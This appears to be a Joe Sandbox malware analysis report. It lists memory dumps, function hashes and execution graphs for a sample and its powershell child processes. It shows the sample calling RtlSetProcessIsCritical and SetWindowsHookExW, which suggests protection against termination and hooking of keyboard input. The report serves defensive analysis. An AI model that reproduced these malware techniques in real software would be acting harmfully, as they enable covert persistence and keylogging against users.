                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1817700531.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_129d000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1708ebf270311a412c1b312036dc3303944477ec9c5e308c736249be4edfb49f
                                                                                  • Instruction ID: b74d08d639dde0013219d6c3808f3283ca758b8af960feca94553ee7899eb827
                                                                                  • Opcode Fuzzy Hash: 1708ebf270311a412c1b312036dc3303944477ec9c5e308c736249be4edfb49f
                                                                                  • Instruction Fuzzy Hash: 77214671614208DFCF01DF5CD9C0B2ABB65FB84315F20C569D9094B246C37AD446DEA1
                                                                                  Function 0128D04F Relevance: .1, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1817560559.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_128d000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: af571a8072d0dd06b83227ef23aab6134eafaf101585d62cdefd210654407788
                                                                                  • Instruction ID: 87c1f74106d2f41e40961414f543ec7da7d0f58dc8d7bf1ed7967913f09294c3
                                                                                  • Opcode Fuzzy Hash: af571a8072d0dd06b83227ef23aab6134eafaf101585d62cdefd210654407788
                                                                                  • Instruction Fuzzy Hash: 3121CD72404284DFCF06DF44D9C4B16BF72FF88314F28C6A9DA480A296C33AD42ACB91
                                                                                  Function 0129D2EF Relevance: .1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1817700531.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_129d000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dff13d54f3b91835ad91617696d418c13a4717a8e78c88f658639b396ea067ac
                                                                                  • Instruction ID: bbbf978e437971341d50ed843fcded316e1dc116b17d04550bd1831e21e40888
                                                                                  • Opcode Fuzzy Hash: dff13d54f3b91835ad91617696d418c13a4717a8e78c88f658639b396ea067ac
                                                                                  • Instruction Fuzzy Hash: 6411BF76504284CFDB12CF58D5C4B1AFF61FB84324F28C6AAD9494B646C33AD44ADFA2
                                                                                  Function 0129D49F Relevance: .1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1817700531.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_129d000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
                                                                                  • Instruction ID: 9874c3ef5b9a81c80277b9471a139e759be505ec82e503c00d924bee66c45eaf
                                                                                  • Opcode Fuzzy Hash: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
                                                                                  • Instruction Fuzzy Hash: 2A11DD75504284CFDF12CF58D5C4B15BFA1FB84318F28C6AADA494B652C33AD44ADB62
                                                                                  Function 0128DAA5 Relevance: .0, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1817560559.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_128d000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b72c69178b64d1c250437adc0087e58e191da124a193bcdf47eddc28686b2b14
                                                                                  • Instruction ID: bca4060a846d5649219383580c18d7a65bf4a5bff63ab4fd1825f49657525bf0
                                                                                  • Opcode Fuzzy Hash: b72c69178b64d1c250437adc0087e58e191da124a193bcdf47eddc28686b2b14
                                                                                  • Instruction Fuzzy Hash: CA012B3101A3489AE7109F6ACD84767FFD8EF41324F18C96AEE084B2C6C679D848C671
                                                                                  Function 0128DAA4 Relevance: .0, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1817560559.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_128d000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 67b2944f5a406047fab738a2a1f13efa2e5b1ec94d0e7674acab6a3e6ad3c12b
                                                                                  • Instruction ID: ebb12b96f221a995530a777ff29becbafe8b3074e9fcad4e02c654a0c393bcf0
                                                                                  • Opcode Fuzzy Hash: 67b2944f5a406047fab738a2a1f13efa2e5b1ec94d0e7674acab6a3e6ad3c12b
                                                                                  • Instruction Fuzzy Hash: 56F0C2714053449EEB108E1ACCC4B66FFA8EB41725F18C95AEE084B2C6C2799848CA70

                                                                                  Non-executed Functions

                                                                                  Function 06590D50 Relevance: 10.3, Strings: 8, Instructions: 296COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                  • API String ID: 0-3823777903
                                                                                  • Opcode ID: d180f53e55aa529564249c5be195f3f733960a9c8a1d12e61373c731f2fd7c91
                                                                                  • Instruction ID: 92173fdd8ebc07f5ddf959e943f31b4e78895a68a5d8578763371cb1161ccf98
                                                                                  • Opcode Fuzzy Hash: d180f53e55aa529564249c5be195f3f733960a9c8a1d12e61373c731f2fd7c91
                                                                                  • Instruction Fuzzy Hash: 7DB1CF30B002098FDF55DB69C9449AEBBF6BF88314B14886EE406DB3A1CB35DC55CBA1

                                                                                  Execution Graph

                                                                                  Execution Coverage:17.1%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:6
                                                                                  Total number of Limit Nodes:0
                                                                                  execution_graph 5482 7ffd9b27206d 5483 7ffd9b27209f RtlSetProcessIsCritical 5482->5483 5485 7ffd9b272152 5483->5485 5486 7ffd9b27282a 5487 7ffd9b272e30 SetWindowsHookExW 5486->5487 5489 7ffd9b272ee1 5487->5489

                                                                                  Executed Functions

                                                                                  Function 00007FFD9B27206D Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 488 7ffd9b27206d-7ffd9b272150 RtlSetProcessIsCritical 492 7ffd9b272152 488->492 493 7ffd9b272158-7ffd9b27218d 488->493 492->493
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2942525714.00007FFD9B270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B270000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b270000_YsrQekGS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2695349919-0
                                                                                  • Opcode ID: f12dade7880df21767594b55fa6e95f220ceacd08c2835b39b782359fd6bfeca
                                                                                  • Instruction ID: 4fecf440d7f4df89043c1fcd9f99dfb438dba977be30e781919a0f83c6f68560
                                                                                  • Opcode Fuzzy Hash: f12dade7880df21767594b55fa6e95f220ceacd08c2835b39b782359fd6bfeca
                                                                                  • Instruction Fuzzy Hash: 3241033190C6498FCB18DFA8D855BE9BBF0FF56311F04416EE08AC3692CB746846CB91
                                                                                  Function 00007FFD9B272E08 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 514 7ffd9b272e08-7ffd9b272e0f 515 7ffd9b272e11-7ffd9b272e19 514->515 516 7ffd9b272e1a-7ffd9b272e8d 514->516 515->516 520 7ffd9b272e93-7ffd9b272ea0 516->520 521 7ffd9b272f19-7ffd9b272f1d 516->521 522 7ffd9b272ea2-7ffd9b272edf SetWindowsHookExW 520->522 521->522 524 7ffd9b272ee1 522->524 525 7ffd9b272ee7-7ffd9b272f18 522->525 524->525
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2942525714.00007FFD9B270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B270000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b270000_YsrQekGS.jbxd
                                                                                  Similarity
                                                                                  • API ID: HookWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2559412058-0
                                                                                  • Opcode ID: b46fb0f4f019d485d56054d0e96a0179c577e5e0397009e51db812a023caa832
                                                                                  • Instruction ID: f270310a8693d8a664e392884ce19ba6a7d5dd34c1be5b3fbc89cbcdb466ae5d
                                                                                  • Opcode Fuzzy Hash: b46fb0f4f019d485d56054d0e96a0179c577e5e0397009e51db812a023caa832
                                                                                  • Instruction Fuzzy Hash: FF311730A0CA5C4FDB1CDFAC9856AF97BE1EB55321F00427ED049C3296CA64B852C7C1
                                                                                  Function 00007FFD9B27282A Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 562 7ffd9b27282a-7ffd9b272e8d 566 7ffd9b272e93-7ffd9b272ea0 562->566 567 7ffd9b272f19-7ffd9b272f1d 562->567 568 7ffd9b272ea2-7ffd9b272edf SetWindowsHookExW 566->568 567->568 570 7ffd9b272ee1 568->570 571 7ffd9b272ee7-7ffd9b272f18 568->571 570->571
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2942525714.00007FFD9B270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B270000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b270000_YsrQekGS.jbxd
                                                                                  Similarity
                                                                                  • API ID: HookWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2559412058-0
                                                                                  • Opcode ID: a3ad86e0d28d329692cd74371afd34e9c72e727b185d81927051056f7c9954f2
                                                                                  • Instruction ID: 42cfff20cb4f3a7ae0aea8b08d18cd0e5a32f9666a6498b60eff7049f0138a9d
                                                                                  • Opcode Fuzzy Hash: a3ad86e0d28d329692cd74371afd34e9c72e727b185d81927051056f7c9954f2
                                                                                  • Instruction Fuzzy Hash: 4431C430A1CA1C8FDB58EF9CD8466B977E1EB59321F10423ED00ED3296CB64B8128BC5

                                                                                  Executed Functions

                                                                                  Function 00007FFD9B37660A Relevance: 1.7, Strings: 1, Instructions: 467COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1772440352.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b370000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: X7N
                                                                                  • API String ID: 0-3255769998
                                                                                  • Opcode ID: 3b25a529be9a92d21e24886f905fbadf5768b382b7e744af3e70e97f2069e983
                                                                                  • Instruction ID: 17b6ed9e51fb1053007e471de779345da0b86f40a678bc667a81de16ce0161cc
                                                                                  • Opcode Fuzzy Hash: 3b25a529be9a92d21e24886f905fbadf5768b382b7e744af3e70e97f2069e983
                                                                                  • Instruction Fuzzy Hash: 9ED15632B0EACD1FEB65EBA848B59B47BE1EF56210B0941FED05DC70E7DA18AD018341
                                                                                  Function 00007FFD9B2AA042 Relevance: .3, Instructions: 283COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1771882044.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b2a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7e7cff28e084349eaf7037ebf4ed1a74682c3d52cbcdf39c63a2798f10f90ee6
                                                                                  • Instruction ID: e9c5d399be2edb236f10e11cd2bc1d5a4e18deee4aed40e42901cd425526b427
                                                                                  • Opcode Fuzzy Hash: 7e7cff28e084349eaf7037ebf4ed1a74682c3d52cbcdf39c63a2798f10f90ee6
                                                                                  • Instruction Fuzzy Hash: 4531C63690E7D99FE766ABACA8765E43FA0EF13214F0900F7C099CA0E3E95819558742
                                                                                  Function 00007FFD9B2AA0D3 Relevance: .3, Instructions: 258COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1771882044.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b2a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 20cb55496c96ff83eaa2f7844a40f73237409433ad91314041d6d12de95607ed
                                                                                  • Instruction ID: d7374a54795740a99c6ded754c2ee5fe204b50523d6a7dfe678da540724a03d5
                                                                                  • Opcode Fuzzy Hash: 20cb55496c96ff83eaa2f7844a40f73237409433ad91314041d6d12de95607ed
                                                                                  • Instruction Fuzzy Hash: 5B114F7290FBC85FD7539B7888791943FB0EE63251B0A05EBC488CB1B3D5195949C793
                                                                                  Function 00007FFD9B2A9758 Relevance: .1, Instructions: 130COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1771882044.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b2a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e85914eee19df05d902b803a6f96d9be4633624e0c20f74c19e2738012c5865e
                                                                                  • Instruction ID: faae9d8f811d5bb85c3537ec2b88652077312bc08e3060c37e572664d7bed881
                                                                                  • Opcode Fuzzy Hash: e85914eee19df05d902b803a6f96d9be4633624e0c20f74c19e2738012c5865e
                                                                                  • Instruction Fuzzy Hash: BC311B7190CB4C9FDB189F5CAC4A6B87BE0FB99710F00812FE449C3291CA20B851CBC2
                                                                                  Function 00007FFD9B18E384 Relevance: .1, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1771315960.00007FFD9B18D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B18D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b18d000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3e1e973cd8c8d2b47336079b2e24e4e3efc18812d031d77a8c54e17553147000
                                                                                  • Instruction ID: 62c18203e30d320b5f7cd4d10e48d90ab265bc8473cc2b4a9f2d9f18c3393866
                                                                                  • Opcode Fuzzy Hash: 3e1e973cd8c8d2b47336079b2e24e4e3efc18812d031d77a8c54e17553147000
                                                                                  • Instruction Fuzzy Hash: F541237280EFC84FE7668B2898519523FB0FF52324B0601EFD488CB1A3D625A946C792
                                                                                  Function 00007FFD9B2AA62C Relevance: .1, Instructions: 103COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1771882044.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b2a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 26001a99c79c6ca781f6dca8ce994191ed91087ba1c0e54115fd955f5ed2d661
                                                                                  • Instruction ID: 38d427c7d4d2d6649b2274c06284a98c09d1f9e58fb6a4367740b9936c0efa8c
                                                                                  • Opcode Fuzzy Hash: 26001a99c79c6ca781f6dca8ce994191ed91087ba1c0e54115fd955f5ed2d661
                                                                                  • Instruction Fuzzy Hash: 7521F83190CB4C4FEB59DFAC984A7E97FF0EB96321F04426BD048C3196DA74A45ACB91
                                                                                  Function 00007FFD9B2A33B5 Relevance: .0, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1771882044.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b2a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                  • Instruction ID: 695a41e6a3268453f63ea608c3ef483d483d8d6c3c36ae7a1d1d4998015c76de
                                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                  • Instruction Fuzzy Hash: 9901677121CB0C4FD748EF0CE451AA5B7E0FB95364F10056DE58AC36A5DA36E882CB46
                                                                                  Function 00007FFD9B37414D Relevance: .0, Instructions: 37COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1772440352.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b370000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: deb124c6871c360649513401f94d689cfc48b0a6449fa53c1ea9585f6215f64d
                                                                                  • Instruction ID: 2fef29d525fd2c9649cca63da04343b5b7d04da8d5075005b1bc5406a6154acd
                                                                                  • Opcode Fuzzy Hash: deb124c6871c360649513401f94d689cfc48b0a6449fa53c1ea9585f6215f64d
                                                                                  • Instruction Fuzzy Hash: C3F09A32B0D9098FD768FA4CE4918A877E0EF5932071200BAE06DC75A7CA29FC408780
                                                                                  Function 00007FFD9B374400 Relevance: .0, Instructions: 35COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1772440352.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b370000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 33cef8d38df244dbcb9fa5928e592f73bca32594cc4507ba2d2f306e99188057
                                                                                  • Instruction ID: 6b3d5cbd8d49b3fcabaaf870ad1178516e4be9f7b6f89095e05aeec44578e4c4
                                                                                  • Opcode Fuzzy Hash: 33cef8d38df244dbcb9fa5928e592f73bca32594cc4507ba2d2f306e99188057
                                                                                  • Instruction Fuzzy Hash: 96F05E32A4D5498FD768EA5CE4A18A877E0EF4932475600FAE15DC74A7DA25BC40C750
                                                                                  Function 00007FFD9B3741D1 Relevance: .0, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1772440352.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b370000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                  • Instruction ID: e84a586dcc966f2da4a7cee10b5a8ed5f40e3d7a1628174f1523b0c2d2dd2964
                                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                  • Instruction Fuzzy Hash: 83E01A31B1C8088FDA78EA4CE0919AD73E5EB9833171201BFD14EC7571CA26FD518B80

                                                                                  Non-executed Functions

                                                                                  Function 00007FFD9B2A8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1771882044.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b2a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: L_^4$L_^7$L_^F$L_^J
                                                                                  • API String ID: 0-3225005683
                                                                                  • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                                  • Instruction ID: 6b1fca80049b040f946fd84a8d6541325269d1e23169487ca6f8bb20b7c65ad0
                                                                                  • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                                  • Instruction Fuzzy Hash: 8B21F6B77086359ED3157FBEB819DED3740CF9427434552F2D2A98B093EA1470868AD0

                                                                                  Executed Functions

                                                                                  Function 00007FFD9B38660A Relevance: .4, Instructions: 415COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1917121954.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b380000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 514c1750924aa37780af0d0f581310c1286a2224d1c67507935242a836ec282b
                                                                                  • Instruction ID: 29d06077e2a507974b9cebb6b494ec78222639af80f1fb448a31dbee383c2add
                                                                                  • Opcode Fuzzy Hash: 514c1750924aa37780af0d0f581310c1286a2224d1c67507935242a836ec282b
                                                                                  • Instruction Fuzzy Hash: 1DC13832B0EE8E0FEBA5EBA858659757BD1EF55314F0941BED05DC70E7DA28AD008342
                                                                                  Function 00007FFD9B38662C Relevance: .3, Instructions: 265COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1917121954.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b380000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: afcec5a3d6a439fad0de0cccf6ce178f43e5d2e654418bca58bab0b2d06cae76
                                                                                  • Instruction ID: 682e9cea1d2d329ef9b958baf7f24e9182bcf7c4c0da1354f2b5db64739617ff
                                                                                  • Opcode Fuzzy Hash: afcec5a3d6a439fad0de0cccf6ce178f43e5d2e654418bca58bab0b2d06cae76
                                                                                  • Instruction Fuzzy Hash: 9E810322A0FECA0FEBB5EAE858755347A91EF55314F5A41FED04DCB0E7D928AD048342
                                                                                  Function 00007FFD9B2B974E Relevance: .2, Instructions: 157COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1916340222.00007FFD9B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b2b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bf5e9377e63672570fc68cf585a48101193cd2efe63a313d895ce2a89b80ec9a
                                                                                  • Instruction ID: d7051700ed8c6cae2675849df99ea689f97587fae59b39a9847eab084b980f05
                                                                                  • Opcode Fuzzy Hash: bf5e9377e63672570fc68cf585a48101193cd2efe63a313d895ce2a89b80ec9a
                                                                                  • Instruction Fuzzy Hash: 80411971A0EB885FE719DF6C9C1A6B97FE0FB56310F0441AFD49883193CA64A945CBC2
                                                                                  Function 00007FFD9B19EB89 Relevance: .1, Instructions: 122COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1915405342.00007FFD9B19D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B19D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b19d000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2eff7414a1bca8d223ab2533061ed9e7a737f33e51f10f379188bd90dc7b7b51
                                                                                  • Instruction ID: 3dcf90ca76fb19e40a190e89a57066bb46fe202ea81df524173c3a51b03bca3e
                                                                                  • Opcode Fuzzy Hash: 2eff7414a1bca8d223ab2533061ed9e7a737f33e51f10f379188bd90dc7b7b51
                                                                                  • Instruction Fuzzy Hash: 24412B7240EBC84FE7568B38E8559523FF0EF56324B1605DFD089CB1A3D625A84AC792
                                                                                  Function 00007FFD9B2BA4BC Relevance: .1, Instructions: 103COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1916340222.00007FFD9B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b2b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cb6ded680f7aa1d9ee4d731fe2679ec9180f78085057d23270dd1a33b843648d
                                                                                  • Instruction ID: c3334e68c7af30e11fda3a203106f7206c14815322e7bb7b139fe413b808356e
                                                                                  • Opcode Fuzzy Hash: cb6ded680f7aa1d9ee4d731fe2679ec9180f78085057d23270dd1a33b843648d
                                                                                  • Instruction Fuzzy Hash: 5121FB3190C74C4FDB59DF9C984A7E97BF0EB56321F04426BD049C3162DA74945ACB91
                                                                                  Function 00007FFD9B2BA0FB Relevance: .1, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1916340222.00007FFD9B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b2b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 807c17a5089f1b0bfba5e5b55c8a005175fb9006c50bcc30901789d240c54e2d
                                                                                  • Instruction ID: 6134c5d2a90f1f80c2796265adf7b64a07bf9a2add694e94967e2950964429c4
                                                                                  • Opcode Fuzzy Hash: 807c17a5089f1b0bfba5e5b55c8a005175fb9006c50bcc30901789d240c54e2d
                                                                                  • Instruction Fuzzy Hash: 671125BA95FBDD2EDB928F289C644917FF0FF63600B0542ABD0C8CB162EE105949CB51
                                                                                  Function 00007FFD9B2B33B5 Relevance: .0, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1916340222.00007FFD9B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2B0000, based on PE: false
